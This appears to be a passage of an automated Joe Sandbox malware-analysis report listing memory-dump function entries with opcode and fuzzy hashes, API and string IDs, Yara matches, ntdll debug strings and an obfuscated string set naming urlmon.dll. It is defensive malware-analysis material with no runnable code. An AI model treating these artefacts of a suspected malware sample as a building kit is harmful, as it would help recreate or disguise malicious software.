                                                                                                                        • Instruction ID: ebffde3731bab24e2d878ee78a0a1ba1ac082dcc0ee61f4b71b95bcd71a0a6fb
                                                                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                        • Opcode ID: 622dc321e93db10bf694a24b41b12f8fa2ce90fbe3483d9328452f8c08acddfa
                                                                                                                        • Instruction ID: 031c4e77a13c3dd93aa9ad11469aaff81a128b49d22d72c8b1d6c71fd5b552ee
                                                                                                                        • Opcode Fuzzy Hash: 622dc321e93db10bf694a24b41b12f8fa2ce90fbe3483d9328452f8c08acddfa
                                                                                                                        • Instruction Fuzzy Hash: CD5184B6E0411ABACF20DBA888D0A7EF7F8FB19304B54C1B9E4A5D7641D274DE5097A0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                        • Opcode ID: f61efb050fa52ab1f2b4f81731577aac6c7dcd8a80bce803f6dff6b7f62964bd
                                                                                                                        • Instruction ID: 09da5025fa69a655adcd67099dcde88e0c19e70b3aa42e8cfbaa67239416daa4
                                                                                                                        • Opcode Fuzzy Hash: f61efb050fa52ab1f2b4f81731577aac6c7dcd8a80bce803f6dff6b7f62964bd
                                                                                                                        • Instruction Fuzzy Hash: 5551D171A00645AACB30DF9CCC9497EB7F8EB48300B1484AAF4A6D76C1E674EF40DB60
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00BC4655
                                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00BC46FC
                                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 00BC4787
                                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00BC4725
                                                                                                                        • Execute=1, xrefs: 00BC4713
                                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00BC4742
                                                                                                                        • ExecuteOptions, xrefs: 00BC46A0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                        • API String ID: 0-484625025
                                                                                                                        • Opcode ID: 55b3069ad29e155cc2e82bd85095162db04a7595321eba55f72df276044d0367
                                                                                                                        • Instruction ID: 6f85ff1d299054f949e070f5576ed28b58f178bc4b2efe5474970987bb3615b9
                                                                                                                        • Opcode Fuzzy Hash: 55b3069ad29e155cc2e82bd85095162db04a7595321eba55f72df276044d0367
                                                                                                                        • Instruction Fuzzy Hash: D05107356842196ADF10BBA8DC9AFAE77E8EF45308F2400E9E505A71A1EF70DE45CB50
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldvrm
                                                                                                                        • String ID: +$-$0$0
                                                                                                                        • API String ID: 1302938615-699404926
                                                                                                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                        • Instruction ID: 76781d5db43479a4fdf79c900cf8e3424a780ac5478dfd43b6813e12ed641013
                                                                                                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                        • Instruction Fuzzy Hash: 1B81A170E052499EDF248FA8EA91FFEBBE5EF85310F1842B9D861A7291C7349C40CB51
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: %%%u$[$]:%u
                                                                                                                        • API String ID: 48624451-2819853543
                                                                                                                        • Opcode ID: ffc0de179750bc0fa5b45e0595b58d01101297b6e14c7f8bdd23b765662a5d81
                                                                                                                        • Instruction ID: 98cde415c9078041d0cfcbdd7b5629a12ef6a645f666ce433d54a7f8d2025ead
                                                                                                                        • Opcode Fuzzy Hash: ffc0de179750bc0fa5b45e0595b58d01101297b6e14c7f8bdd23b765662a5d81
                                                                                                                        • Instruction Fuzzy Hash: 8A215E76A00119ABCB10EF79CC45AAEBBF8EF54744F040166E955E3241EB30DE01DBA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00BC02BD
                                                                                                                        • RTL: Re-Waiting, xrefs: 00BC031E
                                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00BC02E7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                        • API String ID: 0-2474120054
                                                                                                                        • Opcode ID: b2b46a8dca71b4d8cb04877352a7cc4b963c7557eaf527623203cc3444eee4b8
                                                                                                                        • Instruction ID: 86d440aa05e94bd09c6177f520f8fd1916d85b64eb157c8c4dce7bfceb19e5ef
                                                                                                                        • Opcode Fuzzy Hash: b2b46a8dca71b4d8cb04877352a7cc4b963c7557eaf527623203cc3444eee4b8
                                                                                                                        • Instruction Fuzzy Hash: E6E1AD30618742DFD724DF28C885B2AB7E0FB88314F244AADF5A98B2E1D774D945CB46
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        • RTL: Resource at %p, xrefs: 00BC7B8E
                                                                                                                        • RTL: Re-Waiting, xrefs: 00BC7BAC
                                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00BC7B7F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                        • API String ID: 0-871070163
                                                                                                                        • Opcode ID: 1e2a2c3563040acd07e6ee7cca04f8014b771879aecd1cc40a8e02dd5790db59
                                                                                                                        • Instruction ID: 899e4d3a26e72587dd0f90dc665fe58c3f5e3c288f7ee583a3e026afad5e7bb3
                                                                                                                        • Opcode Fuzzy Hash: 1e2a2c3563040acd07e6ee7cca04f8014b771879aecd1cc40a8e02dd5790db59
                                                                                                                        • Instruction Fuzzy Hash: 0041E1357447029FCB20EE25CC51F6AB7E5EF88710F100AADF95A9B6A1DB30E805CB91
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BC728C
                                                                                                                        Strings
                                                                                                                        • RTL: Resource at %p, xrefs: 00BC72A3
                                                                                                                        • RTL: Re-Waiting, xrefs: 00BC72C1
                                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 00BC7294
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                        • API String ID: 885266447-605551621
                                                                                                                        • Opcode ID: c87f4dbf9b3244b160457652eaa49ecc6299a3dcbd50cfa77bc35b0858d7af79
                                                                                                                        • Instruction ID: db895704753366a32cb35628036f3aca51eb2cb6a838cfa79dbce9e257868a36
                                                                                                                        • Opcode Fuzzy Hash: c87f4dbf9b3244b160457652eaa49ecc6299a3dcbd50cfa77bc35b0858d7af79
                                                                                                                        • Instruction Fuzzy Hash: 5941F031788616ABDB20DE25CC42F66B7E5FB55710F2406ADF855EB391DB20E802CBD1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: %%%u$]:%u
                                                                                                                        • API String ID: 48624451-3050659472
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldvrm
                                                                                                                        • String ID: +$-
                                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $$@
                                                                                                                        • API String ID: 0-1194432280
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 00BDCFBD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CallFilterFunc@8
                                                                                                                        • String ID: @$@4Qw@4Qw
                                                                                                                        • API String ID: 4062629308-2383119779
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: !B$&|V$Kx$($)$*5$,$-2$2t$6$7$85$:&$:+$;$<N$=$>b$B$B$E$Kx$Oe$T$T?W$\$^4$`$ap$d$d+$dq$gz$h$l$nT$c
                                                                                                                        • API String ID: 0-876757530
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 6$O$S$\$s
                                                                                                                        • API String ID: 0-3854637164
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ;u
                                                                                                                        • API String ID: 0-1560574068
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2b7256b9de58f1e5f9dcdfe6c1a4b46a1a9fa2feab021dd5eff7f35025366eb1
                                                                                                                        • Instruction ID: 92e4256eecca1a7d9594aae67e97f95505cfa61e37e5240e25f036aab6c90bb5
                                                                                                                        • Opcode Fuzzy Hash: 2b7256b9de58f1e5f9dcdfe6c1a4b46a1a9fa2feab021dd5eff7f35025366eb1
                                                                                                                        • Instruction Fuzzy Hash: 901186F23802057BF720AA55AC46FAF375C9B94B20F244019FF08AF1C0D6B5B81546B5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bf6c8687be1b8a9d388aff82e181b3783d19c104f41b9aa1b3f6c0cb29e98691
                                                                                                                        • Instruction ID: 6f745bfc53df5768006a1efe6300e98ef1b4010cfc34c58a737d18c8fa694f3d
                                                                                                                        • Opcode Fuzzy Hash: bf6c8687be1b8a9d388aff82e181b3783d19c104f41b9aa1b3f6c0cb29e98691
                                                                                                                        • Instruction Fuzzy Hash: 651117B6200649AFDB14DF99EC84EEF73EDAF9D710F008208FA1997240D634A9118BA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b52db7fae8e141aff2968c6f866b5ee51f75ba719bb8f76033e7ff3d73dbb293
                                                                                                                        • Instruction ID: 58ef19464de5375af63cec742777625cb67483d817c3c13b1bbe47b69dd7c3f8
                                                                                                                        • Opcode Fuzzy Hash: b52db7fae8e141aff2968c6f866b5ee51f75ba719bb8f76033e7ff3d73dbb293
                                                                                                                        • Instruction Fuzzy Hash: BA1163B2300649BFDB10DE98EC84EEB73ADEF88710F008409FA0987240DA74B851CBB1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c9b5340f0f1336de7dc5247dd8f818f08f0a4faa1364d74a6a5a8bf1fc8274e5
                                                                                                                        • Instruction ID: 2f744a7ce359859005904771271ee31d4481fef63e7c23966a8760266c8057e7
                                                                                                                        • Opcode Fuzzy Hash: c9b5340f0f1336de7dc5247dd8f818f08f0a4faa1364d74a6a5a8bf1fc8274e5
                                                                                                                        • Instruction Fuzzy Hash: 7511DDF6E11219AF8F00DFA9D9409EFB7F9EF58200F14416AE915E7200E6705A058BE1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2cc8db566a2d0afda169cf39e554042c4fe51b7b45edf600f0587ec796240fbc
                                                                                                                        • Instruction ID: 6d24e7fbad6f945914249dffdc47ef758b4bcc0c3ac740a075f77c8f860231a3
                                                                                                                        • Opcode Fuzzy Hash: 2cc8db566a2d0afda169cf39e554042c4fe51b7b45edf600f0587ec796240fbc
                                                                                                                        • Instruction Fuzzy Hash: F40196F6B402146BE710E664EC4DEFF736CDF54620F000265FE1497241FA70AE518AE2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d8486c930f9b0edb6cbb9d30e870557a0a596ea785dca6b862118389b6b94e95
                                                                                                                        • Instruction ID: 020270c30576d6414c35bc776ef6a89e63a8ca972f9c42847109da74a195b0f1
                                                                                                                        • Opcode Fuzzy Hash: d8486c930f9b0edb6cbb9d30e870557a0a596ea785dca6b862118389b6b94e95
                                                                                                                        • Instruction Fuzzy Hash: DE11F1B2E0121CAF8F40DFE9D9409EEBBF9EF58210F05416AE919F7200F7745A448BA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 173661e0426da9f1ef9810c6f3972b2669705f845cd542c643e28ae35cb5a8bf
                                                                                                                        • Instruction ID: b18cf207bca19b75375bfab8fbef8a3ba55a4443a8893e969506d927eadc8c34
                                                                                                                        • Opcode Fuzzy Hash: 173661e0426da9f1ef9810c6f3972b2669705f845cd542c643e28ae35cb5a8bf
                                                                                                                        • Instruction Fuzzy Hash: F0015AB13006547BEA10EA59EC49FEF73ADEBD9711F004419FA099B240DA747951CBA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: dabefb08cd10c2445031813b6740725559fac14081b69d3d5020b57d55564613
                                                                                                                        • Instruction ID: d09e4790d3e6bd1062dafa4cb3aeb25b5ff0aa05be0d3c114ffbde659a45b2ec
                                                                                                                        • Opcode Fuzzy Hash: dabefb08cd10c2445031813b6740725559fac14081b69d3d5020b57d55564613
                                                                                                                        • Instruction Fuzzy Hash: 940188B13006846BE610EA55EC45FEF73ADEFD5710F00441AFA099B240D6747911CBA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ce50ef4ac5ff3f974d94596ed091564ae278db4f36118869303ec6153950396e
                                                                                                                        • Instruction ID: 87179cd4ca3267b33e05575afa040316bc74e26394f9db4a005fb07251ea39ce
                                                                                                                        • Opcode Fuzzy Hash: ce50ef4ac5ff3f974d94596ed091564ae278db4f36118869303ec6153950396e
                                                                                                                        • Instruction Fuzzy Hash: C111A8B1D15229AF8B50CFA9D48519DBBF8FB09A20F10826BE868E7200E7718651CFD1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ac15622d25422d9a6221c71a7f636310695f2035a26e171d8c0a5528f58ceda3
                                                                                                                        • Instruction ID: 7c8b2ce90092919b8b2d5acec57b5fb7d71d3fa6682137421afb011b4eb3c821
                                                                                                                        • Opcode Fuzzy Hash: ac15622d25422d9a6221c71a7f636310695f2035a26e171d8c0a5528f58ceda3
                                                                                                                        • Instruction Fuzzy Hash: BDF07D7391972647D302162DB846BCC7B94EF61110F800A7AEC808F286C35268578791
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f12e911e26f4a6b4a849f1f4722be75341e2d5712503af54260f892dc2f018f3
                                                                                                                        • Instruction ID: 78ebd89a6f68a32afc41d96b7ff8b6d376b2f5c2b0c4d3b86f416a68e09362c8
                                                                                                                        • Opcode Fuzzy Hash: f12e911e26f4a6b4a849f1f4722be75341e2d5712503af54260f892dc2f018f3
                                                                                                                        • Instruction Fuzzy Hash: 610180B2215549BBCB54DE99DC80EEB77ADAF8C714F018219BA09E7240DA30F9518BA4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8f9ac809a8f5f00a139709d033a1c9ded0deedd39013e70656d76130b136ffcf
                                                                                                                        • Instruction ID: 04062a315d6a714c97caa52429adc5e701c3a81169005a1ac24b1bde722f3713
                                                                                                                        • Opcode Fuzzy Hash: 8f9ac809a8f5f00a139709d033a1c9ded0deedd39013e70656d76130b136ffcf
                                                                                                                        • Instruction Fuzzy Hash: E901C5B6D01219AE8B40DFE8D944AEEBBF8AB18200F54456AE915F3200E7755A048BA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Strings
                                                                                                                        • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                                                                        • API String ID: 0-3248090998

                                                                                                                        Strings
                                                                                                                        • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
